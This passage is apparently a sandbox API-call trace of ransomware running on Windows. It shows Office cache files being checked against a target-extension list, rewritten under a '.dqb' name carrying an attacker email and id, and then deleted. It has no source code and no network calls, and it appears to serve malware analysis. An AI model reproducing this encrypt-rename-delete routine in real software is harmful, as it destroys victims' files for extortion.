dwFileAttributes=0x2020) returned 1 [0034.834] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 1 [0034.834] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.834] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.834] lstrlenW (lpString=".doc") returned 4 [0034.834] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.834] lstrlenW (lpString=".docx") returned 5 [0034.834] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.834] lstrlenW (lpString=".pdf") returned 4 [0034.835] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.835] lstrlenW (lpString=".xls") returned 4 [0034.835] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.835] lstrlenW (lpString=".xlsx") returned 5 [0034.835] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.835] lstrlenW (lpString=".ppt") returned 4 [0034.835] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.835] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.835] lstrlenW (lpString=".zip") returned 4 [0034.835] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.835] lstrlenW (lpString=".rar") returned 4 [0034.835] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.835] lstrlenW (lpString=".bz2") returned 4 [0034.835] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.835] lstrlenW (lpString=".7z") returned 3 [0034.835] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.835] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.835] lstrlenW (lpString=".dbf") returned 4 [0034.835] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.835] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.835] lstrlenW (lpString=".1cd") returned 4 [0034.835] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.835] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.835] lstrlenW (lpString=".jpg") returned 4 [0034.835] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.835] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.835] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.835] lstrlenW (lpString=".doc") returned 4 [0034.835] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.835] lstrlenW (lpString=".docx") returned 5 [0034.835] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.835] lstrlenW (lpString=".pdf") returned 4 [0034.835] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.835] lstrlenW (lpString=".xls") returned 4 [0034.835] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.835] lstrlenW (lpString=".xlsx") returned 5 [0034.835] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.836] lstrlenW (lpString=".ppt") returned 4 [0034.836] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.836] lstrlenW (lpString=".zip") returned 4 [0034.836] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.836] lstrlenW (lpString=".rar") returned 4 [0034.836] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.836] lstrlenW (lpString=".bz2") returned 4 [0034.836] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.836] lstrlenW (lpString=".7z") returned 3 [0034.836] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.836] lstrlenW (lpString=".dbf") returned 4 [0034.836] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.836] lstrlenW (lpString=".1cd") returned 4 [0034.836] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.836] lstrlenW (lpString=".jpg") returned 4 [0034.836] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.836] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.836] lstrlenW (lpString="GrooveMUI.xml") returned 13 [0034.836] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.173] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=913) returned 1 [0035.173] CloseHandle (hObject=0x188) returned 1 [0035.173] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 0x2020 [0035.173] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.173] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.173] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0035.173] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0035.173] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.173] GetLastError () returned 0x0 [0035.173] ReadFile (in: hFile=0x188, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x391, lpOverlapped=0x0) returned 1 [0035.175] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x3a0, lpOverlapped=0x0) returned 1 [0035.176] ReadFile (in: hFile=0x188, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0035.176] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xee, lpOverlapped=0x0) returned 1 [0035.176] SetEndOfFile (hFile=0x180) returned 1 [0035.176] CloseHandle (hObject=0x180) returned 1 [0035.177] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0035.177] SetEndOfFile (hFile=0x188) returned 1 [0035.177] CloseHandle (hObject=0x188) returned 1 [0035.177] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.178] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 1 [0035.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.178] lstrlenW (lpString=".doc") returned 4 [0035.178] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.178] lstrlenW (lpString=".docx") returned 5 [0035.178] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.178] lstrlenW (lpString=".pdf") returned 4 [0035.178] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.178] lstrlenW (lpString=".xls") returned 4 [0035.178] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.178] lstrlenW (lpString=".xlsx") returned 5 [0035.178] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.178] lstrlenW (lpString=".ppt") returned 4 [0035.178] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.178] lstrlenW (lpString=".zip") returned 4 [0035.178] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.178] lstrlenW (lpString=".rar") returned 4 [0035.178] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.178] lstrlenW (lpString=".bz2") returned 4 [0035.178] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.178] lstrlenW (lpString=".7z") returned 3 [0035.178] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.179] lstrlenW (lpString=".dbf") returned 4 [0035.179] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.179] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.179] lstrlenW (lpString=".1cd") returned 4 [0035.179] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.179] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.179] lstrlenW (lpString=".jpg") returned 4 [0035.179] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.179] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.179] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.179] lstrlenW (lpString=".doc") returned 4 [0035.179] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.179] lstrlenW (lpString=".docx") returned 5 [0035.179] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.179] lstrlenW (lpString=".pdf") returned 4 [0035.179] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.179] lstrlenW (lpString=".xls") returned 4 [0035.179] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.179] lstrlenW (lpString=".xlsx") returned 5 [0035.179] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.179] lstrlenW (lpString=".ppt") returned 4 [0035.179] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.179] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.179] lstrlenW (lpString=".zip") returned 4 [0035.179] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.179] lstrlenW (lpString=".rar") returned 4 [0035.179] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.179] lstrlenW (lpString=".bz2") returned 4 [0035.179] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.179] lstrlenW (lpString=".7z") returned 3 [0035.179] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.179] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.179] lstrlenW (lpString=".dbf") returned 4 [0035.179] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.179] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.179] lstrlenW (lpString=".1cd") returned 4 [0035.180] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.180] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.180] lstrlenW (lpString=".jpg") returned 4 [0035.180] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.180] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.180] lstrlenW (lpString="branding.xml") returned 12 [0035.180] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.181] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=596341) returned 1 [0035.181] CloseHandle (hObject=0x180) returned 1 [0035.181] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 0x2020 [0035.181] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.181] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.181] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0035.181] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0035.181] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.181] GetLastError () returned 0x0 [0035.181] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x91975, lpOverlapped=0x0) returned 1 [0035.194] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x91980, lpOverlapped=0x0) returned 1 [0035.206] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0035.206] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.206] SetEndOfFile (hFile=0x1a0) returned 1 [0035.206] CloseHandle (hObject=0x1a0) returned 1 [0035.212] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0035.212] SetEndOfFile (hFile=0x180) returned 1 [0035.810] CloseHandle (hObject=0x180) returned 1 [0035.810] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.810] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 1 [0035.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.810] lstrlenW (lpString=".doc") returned 4 [0035.811] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.811] lstrlenW (lpString=".docx") returned 5 [0035.811] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.811] lstrlenW (lpString=".pdf") returned 4 [0035.811] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.811] lstrlenW (lpString=".xls") returned 4 [0035.811] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.811] lstrlenW (lpString=".xlsx") returned 5 [0035.811] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.811] lstrlenW (lpString=".ppt") returned 4 [0035.811] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.811] lstrlenW (lpString=".zip") returned 4 [0035.811] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.811] lstrlenW (lpString=".rar") returned 4 [0035.811] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.811] lstrlenW (lpString=".bz2") returned 4 [0035.811] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.811] lstrlenW (lpString=".7z") returned 3 [0035.811] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.811] lstrlenW (lpString=".dbf") returned 4 [0035.811] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.811] lstrlenW (lpString=".1cd") returned 4 [0035.811] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.811] lstrlenW (lpString=".jpg") returned 4 [0035.811] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.811] lstrlenW (lpString=".doc") returned 4 [0035.811] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.811] lstrlenW (lpString=".docx") returned 5 [0035.811] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.811] lstrlenW (lpString=".pdf") returned 4 [0035.812] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.812] lstrlenW (lpString=".xls") returned 4 [0035.812] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.812] lstrlenW (lpString=".xlsx") returned 5 [0035.812] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.812] lstrlenW (lpString=".ppt") returned 4 [0035.812] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.812] lstrlenW (lpString=".zip") returned 4 [0035.812] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.812] lstrlenW (lpString=".rar") returned 4 [0035.812] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.812] lstrlenW (lpString=".bz2") returned 4 [0035.812] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.812] lstrlenW (lpString=".7z") returned 3 [0035.812] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.812] lstrlenW (lpString=".dbf") returned 4 [0035.812] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.812] lstrlenW (lpString=".1cd") returned 4 [0035.812] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.812] lstrlenW (lpString=".jpg") returned 4 [0035.812] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.812] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.812] lstrlenW (lpString="Setup.xml") returned 9 [0035.812] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.813] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=2624) returned 1 [0035.813] CloseHandle (hObject=0x180) returned 1 [0035.813] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.813] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.813] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.813] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0035.813] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0035.813] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0035.813] GetLastError () returned 0x0 [0035.813] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xa40, lpOverlapped=0x0) returned 1 [0035.908] WriteFile (in: hFile=0x194, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xa50, lpOverlapped=0x0) returned 1 [0035.909] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0035.909] WriteFile (in: hFile=0x194, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.909] SetEndOfFile (hFile=0x194) returned 1 [0035.909] CloseHandle (hObject=0x194) returned 1 [0035.910] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0035.910] SetEndOfFile (hFile=0x180) returned 1 [0035.911] CloseHandle (hObject=0x180) returned 1 [0035.911] SetFileAttributesW 